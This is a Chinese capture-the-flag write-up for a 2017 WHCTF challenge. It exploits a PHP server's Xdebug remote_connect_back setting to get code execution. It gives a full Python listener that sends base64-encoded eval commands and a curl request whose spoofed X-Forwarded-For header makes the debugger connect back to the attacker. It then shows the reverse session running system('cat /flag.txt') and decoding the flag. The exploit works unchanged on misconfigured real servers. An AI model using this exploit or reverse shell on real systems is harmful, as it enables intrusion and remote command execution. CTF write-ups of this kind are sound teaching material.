考点:xdebug漏洞利用 来源:2017-WHCTF 本题因环境不出网,导致暂时无法使用。
通过 PHPINFO 查看到,Xdebug 开启了如下模式:
xdebug.remote_enable = Onxdebug.remote_connect_back = On
那么,通过 Xdebug 执行命令即可,Exp 如下:
#!/usr/bin/python2
import socket
ip_port = ('0.0.0.0',9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()
while True:
client_data = conn.recv(1024)
print(client_data)
data = raw_input('>> ')
conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))
在存在外网的服务器运行 exp,接着运行命令:
curl '220.249.52.133:36208/phpinfo.php?XDEBUG_SESSION_START=233' -H "X-Forwarded-For: 175.24.98.3"
收到反弹回来的 Xdebug shell:
ricter@baka:/tmp$ python xdebug_exp.py
495<?xml version="1.0" encoding="iso-8859-1"?>
<init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///app/phpinfo.php" language="PHP" xdebug:language_version="7.0.22-0ubuntu0.16.04.1" protocol_version="1.0" appid="11" idekey="233"><engine version="2.6.0-dev"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
>> system("cat /flag.txt");
288<?xml version="1.0" encoding="iso-8859-1"?>
<response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="eval" transaction_id="1"><property type="string" size="25" encoding="base64"><![CDATA[V0hDVEZ7WGQzYnVnXzFzX2F3M3NvbUUhfQ==]]></property></response>
>> Traceback (most recent call last):
File "xdebug_exp.py", line 14, in <module>
data = raw_input('>> ')
EOFError
ricter@baka:/tmp$ echo V0hDVEZ7WGQzYnVnXzFzX2F3M3NvbUUhfQ== | base64 -d
WHCTF{Xd3bug_1s_aw3somE!}
若有收获,就点个赞吧
0 人点赞
